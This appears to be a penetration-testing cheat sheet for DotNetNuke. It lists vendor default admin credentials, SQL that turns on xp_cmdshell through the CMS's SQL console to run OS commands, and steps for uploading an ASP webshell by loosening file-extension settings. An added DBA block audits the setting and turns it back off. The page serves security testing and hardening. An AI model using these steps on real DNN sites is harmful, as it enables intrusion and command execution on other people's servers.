DNN

Default Creds

$ creds search DotNetNuke
+------------------------+----------+----------+
| Product                | username | password |
+------------------------+----------+----------+
| dotnetnuke corporation |  admin   | dnnadmin |
| dotnetnuke corporation |   host   | dnnhost  |
+------------------------+----------+----------+

RCE

SQL Console

System commands can be run via the built-in SQL console under the Settings menu.

-- enable xp_cmdshell
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE

After pressing Run Script, OS commands can be executed.
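
To check whether an instance is exposed to the console technique above, a DBA can audit the relevant settings and the privileges of the site's database login, then reset them. This is an added example, not part of the original page; `dnn_app_login` is a placeholder for the SQL login in the site's connection string.

```sql
-- Added audit example. Run as a DBA on the instance hosting the DNN database.
-- 'dnn_app_login' is a placeholder for the login in the site's connection string.

-- 1. State of the two options changed by the console script.
SELECT name,
       CAST(value AS int)        AS configured,
       CAST(value_in_use AS int) AS running
FROM sys.configurations
WHERE name IN (N'show advanced options', N'xp_cmdshell');

-- 2. What the application login can do. sp_configure changes plus RECONFIGURE
--    need ALTER SETTINGS (held by sysadmin and serveradmin); running
--    xp_cmdshell needs sysadmin or an explicit grant with a proxy account.
EXECUTE AS LOGIN = N'dnn_app_login';
SELECT SUSER_SNAME()                                    AS login_name,
       IS_SRVROLEMEMBER(N'sysadmin')                    AS is_sysadmin,
       IS_SRVROLEMEMBER(N'serveradmin')                 AS is_serveradmin,
       HAS_PERMS_BY_NAME(NULL, NULL, N'ALTER SETTINGS') AS can_alter_settings;
REVERT;

-- 3. Every login that holds one of those server roles.
SELECT m.name AS login_name, r.name AS server_role
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name IN (N'sysadmin', N'serveradmin');

-- 4. Turn xp_cmdshell off again and hide advanced options.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

If step 2 returns 1 in any column, step 4 alone does not hold, because the same login can switch the option back on; move the site to a login without server-level roles.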

ASP Webshell

If the SuperUser account is compromised, we can access the Security settings (Figure 1) and allow any file extensions needed so we can upload a webshell (Figure 2).

Figure 1: Accessing the Security settings.
Figure 2: Add the desired file extensions.

Upload a webshell, such as this .asp webshell (Figure 3).

Figure 3: Upload the webshell.

Get the file's URL by right-clicking it, then interact with the webshell.

Figure 4: Get the URL and interact with the webshell.
